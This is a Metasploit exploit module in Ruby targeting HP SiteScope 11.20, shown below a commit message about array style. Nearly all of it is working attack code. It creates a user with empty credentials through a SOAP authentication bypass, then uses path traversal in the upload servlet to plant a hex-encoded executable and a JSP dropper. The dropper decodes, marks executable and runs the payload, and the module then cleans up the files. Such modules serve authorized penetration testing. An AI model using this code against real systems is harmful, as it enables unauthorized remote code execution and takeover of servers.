c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
354 lines
13 KiB
Ruby
354 lines
13 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
|
|
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::EXE
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'HP SiteScope Remote Code Execution',
|
|
'Description' => %q{
|
|
This module exploits a code execution flaw in HP SiteScope. It exploits two
|
|
vulnerabilities in order to get its objective. An authentication bypass in the
|
|
create operation, available through the APIPreferenceImpl AXIS service, to create
|
|
a new account with empty credentials and, subsequently, uses the new account to
|
|
abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP.
|
|
The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2
|
|
and Linux CentOS 6.3.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
|
|
'juan vazquez' # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '85121' ],
|
|
[ 'OSVDB', '85151' ],
|
|
[ 'BID', '55269' ],
|
|
[ 'BID', '55273' ],
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-174/' ],
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-175/' ]
|
|
],
|
|
'Privileged' => true,
|
|
'Platform' => %w{ linux win },
|
|
'Targets' =>
|
|
[
|
|
[ 'HP SiteScope 11.20 / Windows 2003 SP2',
|
|
{
|
|
'Arch' => ARCH_X86,
|
|
'Platform' => 'win'
|
|
},
|
|
],
|
|
[ 'HP SiteScope 11.20 / Linux CentOS 6.3',
|
|
{
|
|
'Arch' => ARCH_X86,
|
|
'Platform' => 'linux'
|
|
},
|
|
]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Aug 29 2012'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(8080),
|
|
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
|
|
], self.class)
|
|
end
|
|
|
|
def on_new_session(client)
|
|
if client.type == "meterpreter"
|
|
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
|
client.fs.file.rm("../#{@var_hexfile}.txt")
|
|
client.fs.file.rm("../#{@jsp_name}.jsp")
|
|
else
|
|
if target['Platform'] == 'linux'
|
|
client.shell_command_token("rm ../#{@var_hexfile}.txt")
|
|
client.shell_command_token("rm ../#{@jsp_name}.jsp")
|
|
elsif target['Platform'] == 'win'
|
|
client.shell_command_token("del ..\\#{@var_hexfile}.txt")
|
|
client.shell_command_token("del ..\\#{@jsp_name}.jsp")
|
|
end
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
@peer = "#{rhost}:#{rport}"
|
|
@uri = normalize_uri(target_uri.path)
|
|
@uri << '/' if @uri[-1,1] != '/'
|
|
|
|
# Create user with empty credentials
|
|
print_status("#{@peer} - Creating user with empty credentials")
|
|
|
|
if create_user.nil?
|
|
print_error("#{@peer} - Failed to create user")
|
|
return
|
|
end
|
|
|
|
# Generate an initial JSESSIONID
|
|
print_status("#{@peer} - Retrieving an initial JSESSIONID")
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(@uri, 'servlet/Main'),
|
|
'method' => 'POST'
|
|
)
|
|
|
|
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
|
|
session_id = $1
|
|
else
|
|
print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
|
|
return
|
|
end
|
|
|
|
# Authenticate
|
|
login_data = "j_username=&j_password="
|
|
|
|
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => normalize_uri(@uri, 'j_security_check'),
|
|
'method' => 'POST',
|
|
'data' => login_data,
|
|
'ctype' => "application/x-www-form-urlencoded",
|
|
'headers' =>
|
|
{
|
|
'Cookie' => "JSESSIONID=#{session_id}",
|
|
}
|
|
})
|
|
|
|
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
|
|
session_id = $1
|
|
redirect = URI(res.headers['Location']).path
|
|
else
|
|
print_error("#{@peer} - Authentication on SiteScope failed")
|
|
return
|
|
end
|
|
|
|
# Follow redirection to complete authentication process
|
|
print_status("#{@peer} - Following redirection to finish authentication")
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => redirect,
|
|
'method' => 'GET',
|
|
'headers' =>
|
|
{
|
|
'Cookie' => "JSESSIONID=#{session_id}",
|
|
}
|
|
})
|
|
|
|
if not res or res.code != 200
|
|
print_error("#{@peer} - Authentication on SiteScope failed")
|
|
return
|
|
end
|
|
|
|
# Upload the JSP and the raw payload
|
|
@jsp_name = rand_text_alphanumeric(8+rand(8))
|
|
|
|
# begin <payload>.jsp
|
|
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
|
|
jspraw = "<%@ page import=\"java.io.*\" %>\n"
|
|
jspraw << "<%\n"
|
|
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
|
|
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
|
|
jspraw << "String #{var_data} = \"\";\n"
|
|
|
|
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
|
|
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
|
|
jspraw << "}\n"
|
|
|
|
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
|
|
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
|
|
|
|
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
|
|
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
|
|
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
|
|
jspraw << "#{var_inputstream}.close();\n"
|
|
|
|
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
|
|
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
|
|
jspraw << "{\n"
|
|
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
|
|
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
|
|
jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
|
|
jspraw << "#{var_comb} <<= 4;\n"
|
|
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
|
|
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
|
|
jspraw << "}\n"
|
|
|
|
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
|
|
jspraw << "#{var_outputstream}.close();\n"
|
|
|
|
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
|
|
jspraw << "String[] #{var_fperm} = new String[3];\n"
|
|
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
|
|
jspraw << "#{var_fperm}[1] = \"+x\";\n"
|
|
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
|
|
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
|
|
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
|
|
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
|
|
jspraw << "}\n"
|
|
# Linux and other UNICES allow removing files while they are in use...
|
|
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
|
|
jspraw << "} else {\n"
|
|
# Windows does not ..
|
|
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
|
|
jspraw << "}\n"
|
|
|
|
jspraw << "%>\n"
|
|
|
|
# Specify the payload in hex as an extra file..
|
|
payload_hex = payload.encoded_exe.unpack('H*')[0]
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
post_data.add_part(payload_hex, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
|
|
|
|
if target['Platform'] == "linux"
|
|
traversal = "../../../../../../"
|
|
elsif target['Platform'] == "win"
|
|
traversal = "..\\..\\..\\..\\..\\..\\"
|
|
end
|
|
|
|
print_status("#{@peer} - Uploading the payload")
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
|
|
'method' => 'POST',
|
|
'data' => post_data.to_s,
|
|
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
|
'headers' =>
|
|
{
|
|
'Cookie' => "JSESSIONID=#{session_id}",
|
|
}
|
|
})
|
|
|
|
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
|
|
path = $1
|
|
print_good("#{@peer} - Payload successfully uploaded to #{path}")
|
|
else
|
|
print_error("#{@peer} - Error uploading the Payload")
|
|
return
|
|
end
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
|
|
|
|
print_status("#{@peer} - Uploading the JSP")
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
|
|
'method' => 'POST',
|
|
'data' => post_data.to_s,
|
|
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
|
'headers' =>
|
|
{
|
|
'Cookie' => "JSESSIONID=#{session_id}",
|
|
}
|
|
})
|
|
|
|
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
|
|
path = $1
|
|
print_good("#{@peer} - JSP successfully uploaded to #{path}")
|
|
else
|
|
print_error("#{@peer} - Error uploading the JSP")
|
|
return
|
|
end
|
|
|
|
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
|
|
send_request_cgi(
|
|
{
|
|
'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"),
|
|
'method' => 'GET',
|
|
'headers' =>
|
|
{
|
|
'Cookie' => "JSESSIONID=#{session_id}",
|
|
}
|
|
})
|
|
end
|
|
|
|
def create_user
|
|
|
|
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
|
|
data << "<wsns0:Envelope" + "\r\n"
|
|
data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
|
|
data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n"
|
|
data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n"
|
|
data << ">" + "\r\n"
|
|
data << "<wsns0:Body" + "\r\n"
|
|
data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"
|
|
data << ">" + "\r\n"
|
|
data << "<impl:create" + "\r\n"
|
|
data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"
|
|
data << ">" + "\r\n"
|
|
data << "<in0" + "\r\n"
|
|
data << "xsi:type='xsd:string'" + "\r\n"
|
|
data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
|
|
data << ">UserInstancePreferences</in0>" + "\r\n"
|
|
data << "<in1" + "\r\n"
|
|
data << "xsi:type='apachesoap:Map'" + "\r\n"
|
|
data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
|
|
data << ">" + "\r\n"
|
|
data << "<item" + "\r\n"
|
|
data << "xsi:type='apachesoap:mapItem'" + "\r\n"
|
|
data << ">" + "\r\n"
|
|
data << "<key" + "\r\n"
|
|
data << "xsi:nil='true'" + "\r\n"
|
|
data << "xsi:type='xsd:anyType'" + "\r\n"
|
|
data << "></key>" + "\r\n"
|
|
data << "<value" + "\r\n"
|
|
data << "xsi:nil='true'" + "\r\n"
|
|
data << "xsi:type='xsd:anyType'" + "\r\n"
|
|
data << "></value>" + "\r\n"
|
|
data << "</item>" + "\r\n"
|
|
data << "</in1>" + "\r\n"
|
|
data << "</impl:create>" + "\r\n"
|
|
data << "</wsns0:Body>" + "\r\n"
|
|
data << "</wsns0:Envelope>" + "\r\n"
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'),
|
|
'method' => 'POST',
|
|
'ctype' => 'text/xml; charset=UTF-8',
|
|
'data' => data,
|
|
'headers' => {
|
|
'SOAPAction' => '""',
|
|
}})
|
|
|
|
if res and res.code == 200 and res.body =~ /createResponse/ and res.body =~ /_id/
|
|
return res
|
|
end
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|